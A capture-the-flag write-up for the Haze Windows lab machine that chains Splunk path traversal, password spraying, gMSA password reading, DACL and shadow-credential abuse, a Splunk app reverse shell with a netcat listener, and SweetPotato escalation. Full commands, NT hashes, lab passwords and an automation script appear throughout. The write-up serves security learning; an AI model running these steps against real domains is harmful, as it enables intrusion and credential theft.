Haze Writeup

The document outlines a penetration testing process involving enumeration, credential cracking, and privilege escalation on a Windows Server environment. It details the use of tools like Nmap, nxc, and Impacket to exploit vulnerabilities, gain access, and manipulate user permissions. The process culminates in obtaining a Ticket Granting Ticket (TGT) for further access and control over the system.

Uploaded by fayzullayevich15

Haze: Hard Windows machine

Enumeration
We start with Nmap and find several open ports.

Port 8000 is open, serving a Splunk web page.
We tried the default credentials admin:changeme with no luck, so we searched for CVEs and found CVE-2024-36991 (PoC by bigb0x), a path traversal in Splunk Enterprise on Windows caused by the way the web server builds paths with os.path.join. Here is an example:

With the splunk.secret file read through the traversal, the encrypted ($7$...) bindDNpassword stored in authentication.conf can be decrypted (for example with the splunksecrets tool). It is not a hash to crack: Splunk encrypts it with a key derived from splunk.secret.

After decrypting it we recover the LDAP bind password:

Key = Ld@p_Auth_Sp1unk@2k24

We build a list of all the usernames enumerated so far and run nxc against it with the recovered password.

We see that paul.taylor is valid, so we use --rid-brute to enumerate all users and groups by cycling RIDs (pass stands for the recovered password):

➜ haze nxc smb 10.129.232.42 -u paul.taylor -p pass --rid-brute | grep -i "SidTypeUser" | cut -d'\' -f2 | cut -d' ' -f1

We run a password spray with that list (Users) and get a hit on mark.adams:

➜ haze nxc smb 10.129.232.42 -u Users -p pass --continue-on-success
SMB 10.129.232.42 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.42 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.129.232.42 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24

With the new creds we run a --shares scan; the shares are still the default ones.

So we check WinRM:

➜ haze nxc winrm 10.129.232.42 -u mark.adams -p pass
WINRM 10.129.232.42 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM 10.129.232.42 5985 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

So we get a shell:

➜ haze evil-winrm -i dc01.haze.htb -u mark.adams -p "Ld@p_Auth_Sp1unk@2k24"

Remark: always use the full FQDN, Windows loves it <3

Once in, we run

whoami /all

and see that mark.adams is a member of a group called gMSA_Managers:

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
HAZE\gMSA_Managers                          Group            S-1-5-21-323145914-28650650-2368316563-1107  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

The group name gives us a hint: gMSA.

gMSA:
Group Managed Service Accounts are domain accounts that can be used to run services on multiple servers without anyone having to manage their password: the DC generates and rotates it, and only the principals listed in msDS-GroupMSAMembership (shown by PowerShell as PrincipalsAllowedToRetrieveManagedPassword) are allowed to read it.

User
We check the available service accounts:

C:\Users\mark.adams\Documents> Get-ADServiceAccount -Filter *

The PrincipalsAllowedToRetrieveManagedPassword property is empty, and since mark.adams is in gMSA_Managers we try adding our own user to it:

Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"

Then we use gMSADumper.py (micahvandeusen's tool, built on impacket and ldap3 rather than part of Impacket itself) to read the managed password over LDAP and derive the NT hash and Kerberos keys from it:

python3 gMSADumper.py -u mark.adams -p "Ld@p_Auth_Sp1unk@2k24" -d haze.htb

Users or groups who can read password for Haze-IT-Backup$:
 > mark.adams
Haze-IT-Backup$:::735c02c6b2dc54c3c8c6891f55279ebc
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:38c90a95f7e038a6cb57d3e21c405c2875e88f1edbb1e082f1dd75d01eda60fd
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:0926f5e64d85018a506ecadff3df4f95

After getting the creds we test them; they work, but the shares are the default ones as always.

So we go back to BloodHound, this time collecting as Haze-IT-Backup$ (for some reason the collection had to be run twice before the outbound edges showed up). Command:

nxc ldap 10.129.28.250 -u Haze-IT-Backup$ -H '735c02c6b2dc54c3c8c6891f55279ebc' --bloodhound --dns-server 10.129.28.250 -c All --dns-tcp

After uploading the data and searching for a path, we find that Haze-IT-Backup$ has WriteOwner on the SUPPORT_SERVICES group:

WriteOwner Abuse
First we make Haze-IT-Backup$ the owner of the group:

impacket-owneredit -action write -new-owner 'Haze-IT-Backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb'/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip 10.129.28.250 2>/dev/null

As the owner we can rewrite the DACL, so we grant ourselves FullControl over the group:

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'Haze-IT-Backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb'/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip 10.129.28.250 2>/dev/null

pth-net expects LMHASH:NTHASH; since we only have the NT hash we fill the LM half with a dummy value (32 f characters, it is ignored) and use pth-net to add Haze-IT-Backup$ to the group:

pth-net rpc group addmem "SUPPORT_SERVICES" Haze-IT-Backup$ -U "haze.htb"/"Haze-IT-Backup$"%"ffffffffffffffffffffffffffffffff":"735c02c6b2dc54c3c8c6891f55279ebc" -S dc01.haze.htb 2>/dev/null

Since the box runs a cleanup job every few minutes that reverts all of these changes, we wrote a small script to chain the steps (shown below, after the TGT step).

ForceChangePassword Abuse
Searching further, we find that members of SUPPORT_SERVICES have ForceChangePassword on edward.martin.

For some reason, changing the password with net rpc did not work:

pth-net rpc password "edward.martin" "newP@ssword2022" -U "haze.htb"/"Haze-IT-Backup$"%"ffffffffffffffffffffffffffffffff":"735c02c6b2dc54c3c8c6891f55279ebc" -S "dc01.haze.htb"

So instead we went for shadow credentials with pywhisker.py, which adds a certificate to the target's msDS-KeyCredentialLink attribute (this needs write access to that attribute on edward.martin, which we evidently have, as the successful update below shows):

➜ pywhisker git:(main) ✗ python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H ':735C02C6B2DC54C3C8C6891F55279EBC' --target edward.martin --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: e2f859e7-20d4-2d76-99c1-b179f52
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: gP3N5Kkl.pfx
[+] PFX exportiert nach: gP3N5Kkl.pfx
[i] Passwort für PFX: Xl7xpyeRCKx7XkZPk90I
[+] Saved PFX (#PKCS12) certificate & key at path: gP3N5Kkl.pfx
[*] Must be used with password: Xl7xpyeRCKx7XkZPk90I
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

(The two German lines are pywhisker's own output, "PFX exported to" and "Password for PFX"; the automation script further down greps for them verbatim.)

pfx file: gP3N5Kkl.pfx
PFX password: Xl7xpyeRCKx7XkZPk90I

Then we use gettgtpkinit.py from PKINITtools to request a TGT with that certificate (PKINIT):

gettgtpkinit.py -cert-pfx TlFBFH4x.pfx -pfx-pass PfmIKxXrYWsitr0TcSMT haze.htb/edward.martin edward.martin.ccache

(This one is from a later run: the PFX name and password change every time pywhisker is run, which is why the script below extracts them from its output.)

After fixing up a small automation script we ended up with this:

#!/bin/bash
# Chains the whole path from Haze-IT-Backup$ to a shell as edward.martin,
# fast enough to beat the periodic cleanup job.

echo "
Writing the New owner ....
"
impacket-owneredit -action write -new-owner 'Haze-IT-Backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb'/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip 10.129.28.250 2>/dev/null
#spinner
echo "Done."

echo "
Adding Rights ....
"
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'Haze-IT-Backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb'/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip 10.129.28.250 2>/dev/null
#spinner()
echo "Adding Haze-IT-Backup$ to SUPPORT_SERVICES Group ...."
pth-net rpc group addmem "SUPPORT_SERVICES" Haze-IT-Backup$ -U "haze.htb"/"Haze-IT-Backup$"%"ffffffffffffffffffffffffffffffff":"735c02c6b2dc54c3c8c6891f55279ebc" -S dc01.haze.htb 2>/dev/null
#spinner()
echo "User added :)"
echo "Running pywhisker command"
output=$(pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H ':735C02C6B2DC54C3C8C6891F55279EBC' --target edward.martin --action "add")

sleep 2
# Extract the .pfx file name from pywhisker's output
pfx_file=$(echo "$output" | grep -oP "(?<=Converting PEM -> PFX with cryptography: )\S+")

# Extract the PFX password (pywhisker prints this line in German)
pfx_password=$(echo "$output" | grep -oP "(?<=Passwort für PFX: )\S+")

echo "Fixing the problem (The clock skew is too great)"
sudo ntpdate 10.129.28.250
echo "
fixed.
"

echo "Getting TGT in Process"
sudo gettgtpkinit.py -cert-pfx "$pfx_file" -pfx-pass "$pfx_password" haze.htb/edward.martin edward.martin.ccache

echo "Exporting TGT ...."
export KRB5CCNAME=edward.martin.ccache
echo "Done"
sudo ntpdate 10.129.28.250
echo "Connecting ....."
evil-winrm -i dc01.haze.htb -r HAZE.HTB
#echo "Adding Mark.adams to SUPPORT_SERVICES Group ...."
#pth-net rpc group addmem "SUPPORT_SERVICES" mark.adams -U "haze.htb"/"Haze-IT-Backup$"%"ffffffffffffffffffffffffffffffff":"735c02c6b2dc54c3c8c6891f55279ebc" -S dc01.haze.htb 2>/dev/null

Remark: for the Kerberos login to work you need to configure /etc/krb5.conf like this:

[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = HAZE.HTB

[realms]
HAZE.HTB = {
kdc = dc01.HAZE.htb
admin_server = DC01.HAZE.htb
default_domain = HAZE.htb
}

[domain_realm]
.haze.htb = HAZE.HTB
haze.htb = HAZE.HTB

ROOT
After getting a shell as edward.martin we find a zip file in the backup.

After unzipping it we find a password: Sp1unkadmin@2k24
We try it on the web page http://<IP>:8000 and it works.

We asked ChatGPT where any kind of file can be uploaded through the Splunk web interface, and got this:

Going there, we find the page that says the upload must be an app package with the extension .spl or .tar.gz.

Exploit Using
https://github.com/0xjpuff/reverse_shell_splunk
We found this exploit on GitHub; it uses the following file hierarchy:

A small explanation:
when the app package is uploaded, Splunk installs it and reads its inputs.conf, which defines a scripted input, so the scripts in the app's bin directory get executed by splunkd under the account the Splunk service runs as. The attacker only has to put their IP and port into rev.py and run.ps1.
From GitHub:

inputs.conf in this instance is the configuration file that tells splunk to launch the run.bat file and at what interval. In the example below "run.bat" will be run every 10 seconds. Because splunk only runs .bat files, the call inside "run.bat" is to a file with its same name. When run.bat is called, run.ps1 being in the same directory and having the same name will be run.

Steps:
The attacker should modify rev.py and run.ps1 and add their IP and port.

Then tar and gzip the directory and rename the archive to .spl (a .spl file is just a gzipped tarball). Now we're ready to upload it.

nc -nlvp 4444

After starting a listener on port 4444 and uploading the file, we get a shell as alexander.green.

After getting the shell we thought about throwing a Potato such as SweetPotato, because alexander.green has SeImpersonatePrivilege.

After uploading SweetPotato.exe to the machine (into alexander.green's folder) we run:

./SweetPotato.exe -a 'type C:\users\Administrator\desktop\root.txt'

740541ab68491700314f74efe6a86efb
